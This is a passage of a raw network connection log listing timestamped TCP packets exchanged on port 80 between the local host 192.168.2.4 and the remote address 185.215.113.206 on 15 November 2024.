Nov 15, 2024 14:09:11.038002014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038018942 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038039923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038074970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038755894 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038772106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038786888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038801908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038810015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038824081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038826942 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038840055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038851023 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038856983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038872004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038882017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038887024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038902998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038903952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038919926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038934946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038940907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.038950920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.038988113 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039016962 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039655924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039671898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039688110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039701939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039716959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039732933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039741039 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039748907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039764881 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039779902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039781094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039798021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039800882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039813995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039829969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039833069 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039844036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.039866924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.039905071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.053458929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.053520918 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.053571939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.053587914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.053617954 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.053638935 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146478891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146496058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146522045 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146538019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146552086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146567106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146581888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146644115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146706104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146852970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146867037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146881104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146888971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146903992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.146922112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146922112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146922112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146970987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.146970987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147192955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147207975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147222042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147248983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147264004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147277117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147291899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147306919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147322893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147322893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147322893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147384882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147384882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147882938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147897959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147912025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147926092 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147941113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147949934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147958040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147975922 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.147984028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.147990942 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148011923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148046970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148325920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148372889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148497105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148511887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148528099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148536921 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148545027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148559093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148566008 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148575068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148590088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148593903 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148603916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148618937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148629904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148636103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148649931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148658037 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148665905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.148688078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.148720980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149427891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149444103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149457932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149472952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149473906 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149487019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149501085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149517059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149523020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149532080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149547100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149554968 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149560928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149576902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149585009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149590969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149606943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149617910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149621010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.149656057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.149678946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.193447113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193464041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193494081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193506956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193526030 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193537951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.193542957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193566084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193576097 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.193598032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.193629980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.193938971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193953991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193978071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.193991899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194006920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194020987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194094896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194096088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194096088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194096088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194096088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194312096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194324970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194349051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194355965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194369078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194371939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194386959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194396973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194401979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194417000 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194417953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194432020 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194444895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194453955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194462061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.194519043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194519043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194535971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.194991112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195005894 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195019960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195034027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195041895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195050001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195064068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195065975 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195065975 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195079088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195096970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195097923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195111036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195118904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195147991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195168018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195671082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195686102 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195699930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195714951 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195729017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195730925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195746899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195758104 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195760965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195775032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195776939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195795059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195796013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195810080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195826054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195830107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195841074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195846081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195857048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.195874929 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.195899963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196516037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196532011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196544886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196568966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196572065 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196584940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196594954 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196602106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196618080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196621895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196633101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196644068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196649075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196662903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196677923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196677923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196695089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196702957 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196711063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.196729898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.196758986 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197515965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197531939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197545052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197560072 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197567940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197576046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197591066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197593927 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197604895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197618961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197622061 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197633028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197643042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197649002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197664976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197674990 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197679043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197695971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197696924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197712898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.197724104 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.197752953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198628902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198643923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198657036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198674917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198681116 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198689938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198704958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198757887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198757887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198757887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198837042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198852062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198863983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198877096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198889971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198899031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198903084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198915005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198926926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.198932886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198945045 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.198976994 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199414968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199430943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199445009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199460030 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199469090 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199475050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199491024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199491978 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199506998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199516058 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199522018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199532032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199536085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199553013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199563026 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199568987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199578047 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199584961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199601889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.199609041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199621916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.199650049 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.200228930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200244904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200258017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200273991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200288057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200292110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.200303078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200313091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.200315952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200333118 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200339079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.200350046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.200365067 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.200395107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264044046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264072895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264086962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264189005 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264189005 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264323950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264345884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264360905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264374971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264389992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264404058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264419079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264448881 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264448881 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264494896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264678001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264705896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264722109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264736891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264753103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264761925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264770031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.264786959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.264822006 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.265305042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.265320063 CET	80	49730	185.215.113.206	192.168.2.4
